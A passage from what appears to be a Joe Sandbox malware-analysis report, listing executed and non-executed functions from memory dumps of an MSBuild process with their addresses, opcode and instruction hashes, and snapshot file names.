                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1de148d18ea96300c7f9fa7205d21beb78f98ee7210c0a4c4debf652294ecf8c
                                      • Instruction ID: 91e3b39e51f718f1dadce35e7803154f791b82afd7b8020f7704a0ed8046e92c
                                      • Opcode Fuzzy Hash: 1de148d18ea96300c7f9fa7205d21beb78f98ee7210c0a4c4debf652294ecf8c
                                      • Instruction Fuzzy Hash: D941EFB0D0034D9FEB14DFA9C984A9EBBB5BF48314F108029E919AB350DB75A946CF94
                                      Function 02DF50B0 Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea44ff299ed89983eb5537e87b29ff1258cf1c8c3d8214f701c7d2f9b33666b0
                                      • Instruction ID: 3f231e8f7cf8bbcfab03b51860ec58c416823d0f88ad1167ba1685140be7322f
                                      • Opcode Fuzzy Hash: ea44ff299ed89983eb5537e87b29ff1258cf1c8c3d8214f701c7d2f9b33666b0
                                      • Instruction Fuzzy Hash: 43313C34A00214DFDB58EB74E5606AD77B2AB48345F620468D605EB394DB36DC41CBA9
                                      Function 02DFA080 Relevance: .1, Instructions: 82COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 20acbffb05ddbf2a11c1c65912252c08d0a74f8247fbf6c274cd58f6ff970bf4
                                      • Instruction ID: 1a1c004c7d9eda61142cc7c221b829019d6bb122103dd154cbf775d15820a9fb
                                      • Opcode Fuzzy Hash: 20acbffb05ddbf2a11c1c65912252c08d0a74f8247fbf6c274cd58f6ff970bf4
                                      • Instruction Fuzzy Hash: E6317130E106099BDB45CF64D854BAAFBB2BF85310F12C629E919EB344DB70DC46CB81
                                      Function 02DFA090 Relevance: .1, Instructions: 78COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eb9f865e069ed84942151c3170dec8204fb83a0df1debc221b6aada565073101
                                      • Instruction ID: 250f9f334d523fbaa0e3033779397a4bfbcd828934966bbc4f2666b89cf15437
                                      • Opcode Fuzzy Hash: eb9f865e069ed84942151c3170dec8204fb83a0df1debc221b6aada565073101
                                      • Instruction Fuzzy Hash: CB217130E102099BDB45CF65D850B9EF7B2EF89300F11C529E909AB344EB70DC46CB94
                                      Function 02DF9F80 Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fab449714dc985ea905980f67570d63ff3c1aa49db02e71501a19d0ebdd69939
                                      • Instruction ID: e4c6c981259891f6ba1e63c2f9b4e7f49f44c0af1cfe334855809e3e4b33f6e0
                                      • Opcode Fuzzy Hash: fab449714dc985ea905980f67570d63ff3c1aa49db02e71501a19d0ebdd69939
                                      • Instruction Fuzzy Hash: E3219130E002159BDB18CFA5D450ADEF7B2FF89310F21862AE915BB384DB71AD45CB54
                                      Function 02DF16A8 Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7991b65114a3b7b5f273bc1ba9529853d16dc673265c91350a941cf835cf044b
                                      • Instruction ID: 2a793c674f5dbf8ef117455561bc7e61c2ed13be19fee36aa4282497736ac902
                                      • Opcode Fuzzy Hash: 7991b65114a3b7b5f273bc1ba9529853d16dc673265c91350a941cf835cf044b
                                      • Instruction Fuzzy Hash: AA213B38600205CFDF65EB28F894B593B5AEB40701F224926E10ECB35CDB30EC45CB86
                                      Function 02DF1880 Relevance: .1, Instructions: 73COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31759584f8806ad9b7855d5e6c34917e8e002bd372f438a9adc8c776dc38fa5c
                                      • Instruction ID: 5f9629b0ef071b6bdbf3824c58b042d6de2ebb28f6790e44523d277e8fa7cf54
                                      • Opcode Fuzzy Hash: 31759584f8806ad9b7855d5e6c34917e8e002bd372f438a9adc8c776dc38fa5c
                                      • Instruction Fuzzy Hash: 4F217C30B00244DFDB54DB78C5647AD77F2EB89204F220469D60AEB360DB32CD41CBA9
                                      Function 02DF4F90 Relevance: .1, Instructions: 73COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d1aeef46be53f226ad357cec68306da3018c017ebee1b670081ef1ee02b073c7
                                      • Instruction ID: 81d353697a4b0ec2b14178694324be3bb7d56788f95403ba0425fd387084f31e
                                      • Opcode Fuzzy Hash: d1aeef46be53f226ad357cec68306da3018c017ebee1b670081ef1ee02b073c7
                                      • Instruction Fuzzy Hash: 7C211734A002059FDB54EB78D568B9DB7F1EF89305F214468E606EB3A5DB329C01CBA5
                                      Function 02CFD030 Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508271077.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2cfd000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10f96efcb8e323dd515b765bd0fd97159bd4077e8b6b4ff6b9f3802733a04e90
                                      • Instruction ID: ceb0ef745bf20f3dbb2771851792a3878c898ce484604f900f45cc3465ad1dc0
                                      • Opcode Fuzzy Hash: 10f96efcb8e323dd515b765bd0fd97159bd4077e8b6b4ff6b9f3802733a04e90
                                      • Instruction Fuzzy Hash: 7B213471604300DFDB94DF10D9C0B26BBA5FB84314F20C56DDA0A4B682C736D847CAA2
                                      Function 02DF1382 Relevance: .1, Instructions: 71COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c77fb154ad956fd30382e04f59202501d59ccf7eac2d211489c238f114207c73
                                      • Instruction ID: d1f92cee9c680d6a49cb6a866d1fd3507f2db8c6e7d06bfd775f854e09a4091d
                                      • Opcode Fuzzy Hash: c77fb154ad956fd30382e04f59202501d59ccf7eac2d211489c238f114207c73
                                      • Instruction Fuzzy Hash: 7A21D370A00205CBEFB96625E18937C3B96E786715F12082AE64EC7780DB79DC85C78B
                                      Function 02DF1890 Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18ee4ba834c6c69551b20a1695fc6981b8644215788b32c0ff1a274bb9357332
                                      • Instruction ID: b9c7d959163647fe18e45c7e0f9ee5cf917bfbb6a9d01e6bbc3c261fbeb6f922
                                      • Opcode Fuzzy Hash: 18ee4ba834c6c69551b20a1695fc6981b8644215788b32c0ff1a274bb9357332
                                      • Instruction Fuzzy Hash: 23215E30B00245DFDB54EB74D5147AD77F2AB89341F210469D60AEB364DB32CD41CBA9
                                      Function 02DF9F90 Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e5fd0b65295f7c856b1c03332be2938a32ea4d6adb3e85c1581327db1fa05547
                                      • Instruction ID: f06acbce38fba8e32bab11eb220cb9dba47e17b41e547cf3a8724346158ca05b
                                      • Opcode Fuzzy Hash: e5fd0b65295f7c856b1c03332be2938a32ea4d6adb3e85c1581327db1fa05547
                                      • Instruction Fuzzy Hash: 50218030E102159BDB18CFA4D450ADEF7B2FF89310F21862AE915BB384DB71AD45CB54
                                      Function 02DF16B8 Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8042e03a338633a45acd418754533e1c5ce5a028422a21045cba50784bfed33a
                                      • Instruction ID: 8494e1ca5069845e9342433d610c0ca9655a931b255cc038a77ed6accac04f84
                                      • Opcode Fuzzy Hash: 8042e03a338633a45acd418754533e1c5ce5a028422a21045cba50784bfed33a
                                      • Instruction Fuzzy Hash: 9721D538A10205CFDF65EB28F8A475A3B5AEB45715F224926E10ECB35DDB30EC45CB86
                                      Function 02DF4FA0 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4db1d6e34af43506574fc0a48fcb82810d94251e2412774d90a535994588dcf
                                      • Instruction ID: c7df609addda89d224c936378ed71501653469e7a8fd3f8850bcc687abaaa769
                                      • Opcode Fuzzy Hash: f4db1d6e34af43506574fc0a48fcb82810d94251e2412774d90a535994588dcf
                                      • Instruction Fuzzy Hash: 80210734A00205DFDB54EB78D558B9E77F1EB49305F214468E606EB3A4DB319D00CBA5
                                      Function 02CFD005 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508271077.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2cfd000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b1236ade67ec6d1b182c8abc5553380601049f1220419e4466631b1f2ad74424
                                      • Instruction ID: 16af70d228321722dd5be4fe8aac0a6aba88a1c75372d69b3ebfc5990ccf3006
                                      • Opcode Fuzzy Hash: b1236ade67ec6d1b182c8abc5553380601049f1220419e4466631b1f2ad74424
                                      • Instruction Fuzzy Hash: 39215C755093C09FC747CB24C990715BF71AB86214F28C5DBD9898B6A3C33A980ACB62
                                      Function 02DF1390 Relevance: .1, Instructions: 66COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 525f758d5cc93705e0ebac54d66aa5b1dac641ea885d0d80d778d7f604f590b2
                                      • Instruction ID: c24b93afea9dc3821e5adb641b0cf593bcbe2e7724d81a5d6769c42d60a041f4
                                      • Opcode Fuzzy Hash: 525f758d5cc93705e0ebac54d66aa5b1dac641ea885d0d80d778d7f604f590b2
                                      • Instruction Fuzzy Hash: 4C11B270A00215CBEFB96625E18836D3B96E786715F12082AE60EC7780DB75DC85C74B
                                      Function 02DF17C8 Relevance: .1, Instructions: 65COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7d226a22f12fe6e6580dcf8c28714dc91125151087a65d763aabac07c2049cfb
                                      • Instruction ID: 93f04bb2ee40ac541bf1d2748ea6327cd9ab6256a429ab0c5b8ec93825093f49
                                      • Opcode Fuzzy Hash: 7d226a22f12fe6e6580dcf8c28714dc91125151087a65d763aabac07c2049cfb
                                      • Instruction Fuzzy Hash: D711E375B00205AFCF04AB79985879E7FA5FB88250F210439EA4ED3308EB31CC02C795
                                      Function 02DF0848 Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a27ef5e0f712d1e2ac906f74a415bff25518b5474ea95be753294c26e1ce1c90
                                      • Instruction ID: 73b90a44490bc67a23629178069493b1554d63f0faa60630faaee407046e27b5
                                      • Opcode Fuzzy Hash: a27ef5e0f712d1e2ac906f74a415bff25518b5474ea95be753294c26e1ce1c90
                                      • Instruction Fuzzy Hash: 49112334B002098BEFA4BA79D8147293356EB84616F12493AD602CF34EEB21DC41CBD5
                                      Function 02DF07F9 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15d7543508d66ab188adf376666723c646865e7d2185e8e5dfe30d694c50e5e3
                                      • Instruction ID: 06e2e72130942db368b8d35127657f1f92e299af9bb0590116e23afc793f9a81
                                      • Opcode Fuzzy Hash: 15d7543508d66ab188adf376666723c646865e7d2185e8e5dfe30d694c50e5e3
                                      • Instruction Fuzzy Hash: 9311E335F002459BFFA4BA79E8143693751DB8462AF16442BD646CF34EEA21CC49CBCA
                                      Function 02DF1494 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 336692d5690a4a033d51259a110e2f1a71dd157bac0109aa567d9238fbd757eb
                                      • Instruction ID: 3ccfe5f3317d39eff5295cdc889f3569d6b4d5a913b658951300614e4a61b3ec
                                      • Opcode Fuzzy Hash: 336692d5690a4a033d51259a110e2f1a71dd157bac0109aa567d9238fbd757eb
                                      • Instruction Fuzzy Hash: 67115E72E01215CBCFA1EFB884902AD77F5EF88211B26047AC90AE7341E735DD41CBA5
                                      Function 02DF0847 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 20788f4302924ffdb11420689e1c82568956386dcdceb230ca05324d6737b92c
                                      • Instruction ID: 4a7d2c6bdbbd0b451acdf1aa765a07338d44439b26edd853c22eeb0a9911b0f3
                                      • Opcode Fuzzy Hash: 20788f4302924ffdb11420689e1c82568956386dcdceb230ca05324d6737b92c
                                      • Instruction Fuzzy Hash: 9A110834B002459BEFA47A78E4543793712D785616F12493BDA46CF34EEB21CC45CBD5
                                      Function 02DF17D8 Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 37b27e747cb86d1f0cbb0f742ac8a099274c5e0f0b2b4835e9e544c46952ba34
                                      • Instruction ID: 9477f67dbd03d0e221d39316d9632bc3c7efe7e14fcca0c7b6c7af444cfa277d
                                      • Opcode Fuzzy Hash: 37b27e747cb86d1f0cbb0f742ac8a099274c5e0f0b2b4835e9e544c46952ba34
                                      • Instruction Fuzzy Hash: 3301C075B00255AFCB14ABB9A80879E7FE6FB88250F110439EA0AD3308EB35CC01C7D5
                                      Function 02DF14A0 Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f60501d8bd6d668944674b9aa1b0150a98296cf0fc59be7993c3a01405d3c3f
                                      • Instruction ID: 7218f9d43f14cf178712df7fad65f5526d38be2611eb5f4d61a18d7320c9fc2c
                                      • Opcode Fuzzy Hash: 5f60501d8bd6d668944674b9aa1b0150a98296cf0fc59be7993c3a01405d3c3f
                                      • Instruction Fuzzy Hash: 43016D31A01255CBCF61EFB884502AD7BF9EF88211B16047AD909E7341E735DC41CBA9
                                      Function 02DFA6CA Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b519c006fd3749ed3bf8a3820fc8f8a761fb814f4e8ce47b255d3924117d1493
                                      • Instruction ID: d21fa54c90e338f85081e5904260024cb11484fda93ee1997ec232d6d1d62709
                                      • Opcode Fuzzy Hash: b519c006fd3749ed3bf8a3820fc8f8a761fb814f4e8ce47b255d3924117d1493
                                      • Instruction Fuzzy Hash: 6A018431A002048BDB10DF65DD84B8ABB66EF84311F598168D94C5F39ADB70ED45CB91
                                      Function 02DF4107 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e50bbbab3874870d8416780bd79d33f0c40d1a596dffaa8a59bc3220f1a18a7
                                      • Instruction ID: f3bc7247c1fd6dd499741fbe361f01f36f9c6634b2cf4a0c16a685bb472e6a00
                                      • Opcode Fuzzy Hash: 0e50bbbab3874870d8416780bd79d33f0c40d1a596dffaa8a59bc3220f1a18a7
                                      • Instruction Fuzzy Hash: A9110970D0424CDACFB4DA94D9987EDBB72AF2131AF16642AC210B2294DB704CC9CF19
                                      Function 02DF8F20 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57e2af75f0fb53cb1dcf4e65df20d57c0600fd85bacf83ff5dbb340bd7937f30
                                      • Instruction ID: d76a6eee6008f3324b25d005f3f23987996b73cc341ffa20a2f2231ab35ee3cf
                                      • Opcode Fuzzy Hash: 57e2af75f0fb53cb1dcf4e65df20d57c0600fd85bacf83ff5dbb340bd7937f30
                                      • Instruction Fuzzy Hash: 7601623491020DAFDB41FBA4F950B9DBBB1EF40304F1051B9C1059B24DEA317E099B92
                                      Function 02DF7EC0 Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6f683e87c818213b76317e9915a685cf02de2003947547f5eff541270f741124
                                      • Instruction ID: e92c85f0f84cebec5353f11778a883b8fcc0c8c32a64c671a60b36fe82a77ea3
                                      • Opcode Fuzzy Hash: 6f683e87c818213b76317e9915a685cf02de2003947547f5eff541270f741124
                                      • Instruction Fuzzy Hash: 34F0C435B402088FCB08DB68D5A8BAC7BB2EF88315F5544A8E5069B3A4CF31AD42CB40
                                      Function 02DF8F30 Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 333047f687d75000dcf99beed1820d3250adfd6910fa5a292234b8c52f490a9f
                                      • Instruction ID: e805f8c0b447dcd7de4c49c0115cc75a2091a09c7c52c17f5bcccbc8428d1747
                                      • Opcode Fuzzy Hash: 333047f687d75000dcf99beed1820d3250adfd6910fa5a292234b8c52f490a9f
                                      • Instruction Fuzzy Hash: 11F0313491021D9FDB41FFA4F950AADBBB1AB40301F1086B9C1059B25DEA317E099B92

                                      Non-executed Functions

                                      Function 06955670 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                      • API String ID: 0-1298971921
                                      • Opcode ID: 0a26cf6ddba4bd4dd7ee42246477862a82ce5ce309501e22b1ef44e86f0e075e
                                      • Instruction ID: 2f4cdc084d6a49f2c836da32e191fece93d4ff1d7629787a9b10de191390b159
                                      • Opcode Fuzzy Hash: 0a26cf6ddba4bd4dd7ee42246477862a82ce5ce309501e22b1ef44e86f0e075e
                                      • Instruction Fuzzy Hash: 5A122A30E00219CFDB64DB65D854B9EB7B2FF88301F268569D90AAB755DB30AD81CF90
                                      Function 0695C370 Relevance: 4.3, Strings: 3, Instructions: 578COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0oht$Dqht$PHq
                                      • API String ID: 0-215525555
                                      • Opcode ID: bed22e63e2e3d34e1a956b9585f7f2d21b139fea0cf7636ada1e9015fd087d37
                                      • Instruction ID: 6d7e9af77e32488867af2692db1b9bef7b8ac56bd93764a90bde3f4d054cc91a
                                      • Opcode Fuzzy Hash: bed22e63e2e3d34e1a956b9585f7f2d21b139fea0cf7636ada1e9015fd087d37
                                      • Instruction Fuzzy Hash: 6222AF30B10205CFDB64DB68D894B6EBBE6EF88310F268469D806DB765DB31EC45CB91
                                      Function 06953CAB Relevance: 2.9, Strings: 2, Instructions: 429COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: XPq$\Oq
                                      • API String ID: 0-3725437444
                                      • Opcode ID: 043fdb0c49af28ff8970231d629835d1b455d38abbe14e5b6c324e60096c589a
                                      • Instruction ID: 51db778322ad448eebf0850a814fa9f7be046f82659c97ecc8314d9165c3ed7b
                                      • Opcode Fuzzy Hash: 043fdb0c49af28ff8970231d629835d1b455d38abbe14e5b6c324e60096c589a
                                      • Instruction Fuzzy Hash: 6AE11731B101148FDF64DB69D880AAEBBF6FF89750F26846AE806DB751DA31DC41CB90
                                      Function 02DFE4D5 Relevance: 2.0, Instructions: 1961COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a766975de0afb6d2b1c756cfde2e93332393d9db678397a703bae421db7b8f8
                                      • Instruction ID: aa0cfd474754b1260363f555b65e7ebd22140251c1c0a158d7ef99f6ae78d812
                                      • Opcode Fuzzy Hash: 1a766975de0afb6d2b1c756cfde2e93332393d9db678397a703bae421db7b8f8
                                      • Instruction Fuzzy Hash: FF23FB31D10B198EDB11EF68C8806ADF7B1FF99300F15D79AE458A7261EB70AAC5CB41
                                      Function 02DF41D0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \VVm
                                      • API String ID: 0-390912563
                                      • Opcode ID: 17aca77af98fea1fec812050829537b7f71d6a30dba6983e779ba070467a651a
                                      • Instruction ID: 0b1ef78f58870b1ed611dad28e4f64f7cab9c22cfdb37e74a15d4ac8d172ee52
                                      • Opcode Fuzzy Hash: 17aca77af98fea1fec812050829537b7f71d6a30dba6983e779ba070467a651a
                                      • Instruction Fuzzy Hash: C5B15C70E002098FDB64CFA9D8857AEBBF2AF88314F158129DA55A7394EB749C41CF85
                                      Function 06AAA198 Relevance: .3, Instructions: 264COMMON
                                      Download Yara Rule
                                      Memory Dump Source
